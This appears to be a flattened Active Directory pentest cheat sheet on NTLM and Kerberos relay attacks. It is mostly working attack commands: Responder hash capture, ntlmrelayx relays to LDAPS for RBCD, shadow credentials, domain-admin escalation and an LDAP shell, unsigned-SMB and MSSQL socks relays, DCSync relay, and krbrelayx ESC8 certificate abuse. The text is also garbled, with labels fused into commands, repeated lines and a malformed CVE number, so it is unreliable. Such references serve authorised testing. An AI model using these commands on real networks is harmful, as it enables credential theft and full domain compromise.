Listen Hash NTLMv1 or NTLMv2 || Username || Credentials (ldap/http)
responder -l <interface> #use --lm to force downgradesmbclient.py
NTLM relay
-
MS08-068 self relay @CVE@
msf> exploit/windows/smb_smb_relay # windows 2000 / windows server 2008
-
SMB -> LDAP(S)
- NTLMv1
- remove mic (no CVE needed) see LDAP(S)
- NTLMv2
- Remove mic (CVE-2019-1040) @CVE@ see LDAP(S)
- NTLMv1
-
HTTP(S) -> LDAP(S)
- Usually from webdav coerce see LDAP(S)
-
To LDAP(S)
- Relay to LDAP if LDAP signing and LDAPS channel binding not enforced (default)
ntlmrelayx.py -t ldaps://<dc_ip> --remove-mic -smb2support --add-computer <computer_name> <computer_password> --delegate-accessRBCDntlmrelayx.py -t ldaps://<dc_ip> --remove-mic -smb2support --shadow-credentials --shadow-target '<dc_name$>'Shadow Credentialsntlmrelayx.py -t ldaps://<dc_ip> --remove-mic -smb2support --escalate-user <user>Domain adminntlmrelayx.py -t ldaps://<dc_ip> --remove-mic -smb2support --interactive # connect to ldap_shell with nc 127.0.0.1 10111LDAP SHELL
- Relay to LDAP if LDAP signing and LDAPS channel binding not enforced (default)
-
To SMB
- Relay to SMB (if SMB is not signed)
- Find SMB not signed targets (default if not a Domain controler)
nxc smb <ip_range> --gen-relay-list smb_unsigned_ips.txt
ntlmrelayx.py -tf smb_unsigned_ips.txt -smb2support [--ipv6] -socksSMB Socks
- Find SMB not signed targets (default if not a Domain controler)
- Relay to SMB (if SMB is not signed)
-
To HTTP
- Relay to CA web enrollement ESC8
- Relay to WSUS WSUS
-
To MsSQL
ntlmrelayx.py -t mssql://<ip> [-smb2support] -socksMSSQL Socks
-
SMB -> NETLOGON
- Zero-Logon (safe method) (CVE-202-1472) @CVE@
- Relay one dc to another
ntlmrelayx.py -t dcsync://<dc_to_ip> -smb2support -auth-smb <user>:<password>DCSYNC
- Relay one dc to another
- Zero-Logon (safe method) (CVE-202-1472) @CVE@
Kerberos relay
- To HTTP
krbrelayx.py -t 'http://<pki>/certsrv/certfnsh.asp' --adcs --template DomainController -v '<target_netbios>$' -ip <attacker_ip>ESC8
- SMB -> SMB
- same as NTLM relay, use krbrelayx.py
- SMB -> LDAP(S)
- same as NTLM relay, use krbrelayx.py